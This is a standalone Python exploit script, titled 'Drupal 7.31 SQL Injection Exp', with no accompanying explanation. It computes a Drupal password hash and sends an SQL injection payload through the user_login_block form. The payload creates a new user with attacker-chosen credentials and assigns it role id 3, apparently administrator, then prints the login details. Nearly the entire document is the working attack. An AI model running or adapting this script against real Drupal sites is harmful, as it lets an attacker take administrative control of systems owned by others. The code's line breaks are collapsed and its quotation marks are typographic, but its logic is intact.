Drupal 7.31 SQL Injection Exp

#-*- coding:utf-8 -*- import urllib2,sys import hashlib   # Calculate a non-truncated Drupal 7 compatible password hash. # The consumer of these hashes must truncate correctly.   class DrupalHash:     def __init__(self, stored_hash, password):     self.itoa64 = ‘./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz‘     self.last_hash = self.rehash(stored_hash, password)     def get_hash(self):     return self.last_hash     def password_get_count_log2(self, setting):     return self.itoa64.index(setting[3])     def password_crypt(self, algo, password, setting):     setting = setting[0:12]     if setting[0] != ‘$‘ or setting[2] != ‘$‘:       return False       count_log2 = self.password_get_count_log2(setting)     salt = setting[4:12]     if len(salt) < 8:       return False     count = 1 << count_log2       if algo == ‘md5‘:       hash_func = hashlib.md5     elif algo == ‘sha512‘:       hash_func = hashlib.sha512     else:       return False     hash_str = hash_func(salt + password).digest()     for c in range(count):       hash_str = hash_func(hash_str + password).digest()     output = setting + self.custom64(hash_str)     return output     def custom64(self, string, count = 0):     if count == 0:       count = len(string)     output = ‘‘     i = 0     itoa64 = self.itoa64     while 1:       value = ord(string[i])       i += 1       output += itoa64[value & 0x3f]       if i < count:         value |= ord(string[i]) << 8       output += itoa64[(value >> 6) & 0x3f]       if i >= count:         break       i += 1       if i < count:         value |= ord(string[i]) << 16       output += itoa64[(value >> 12) & 0x3f]       if i >= count:         break       i += 1       output += itoa64[(value >> 18) & 0x3f]       if i >= count:         break     return output     def rehash(self, stored_hash, password):     # Drupal 6 compatibility     if len(stored_hash) == 32 and stored_hash.find(‘$‘) == -1:       return hashlib.md5(password).hexdigest()       # Drupal 7     if stored_hash[0:2] == ‘U$‘:       stored_hash = stored_hash[1:]       password = hashlib.md5(password).hexdigest()     hash_type = stored_hash[0:3]     if hash_type == ‘$S$‘:       hash_str = self.password_crypt(‘sha512‘, password, stored_hash)     elif hash_type == ‘$H$‘ or hash_type == ‘$P$‘:       hash_str = self.password_crypt(‘md5‘, password, stored_hash)     else:       hash_str = False     return hash_str   if __name__ == "__main__":     if len(sys.argv) != 4:         print ""         print "python 7.31.py  http://www.secpulse.com/drupal adminasd 1234567"         print ""         sys.exit(1)     host = sys.argv[1]     user = sys.argv[2]     password = sys.argv[3]     hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()     target = ‘%s/?q=node&destination=node‘ % host          insert_user = "name[0%20;set+@a%3d%28SELECT+MAX%28uid%29+FROM+users%29%2b1;INSERT+INTO+users+set+uid%3d@a,status%3d1,name%3d\‘" \                 +user \                 +"‘+,+pass+%3d+‘" \                 +hash[:55] \                 +"‘;INSERT+INTO+users_roles+set+uid%3d@a,rid%3d3;;#%20%20]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in"          content = urllib2.urlopen(url=target, data=insert_user).read()     if "mb_strlen() expects parameter 1" in content:             print "Success!\nLogin now with user:%s and pass:%s" % (user, password)     else:         print "Failed ,Somethings is wrong!"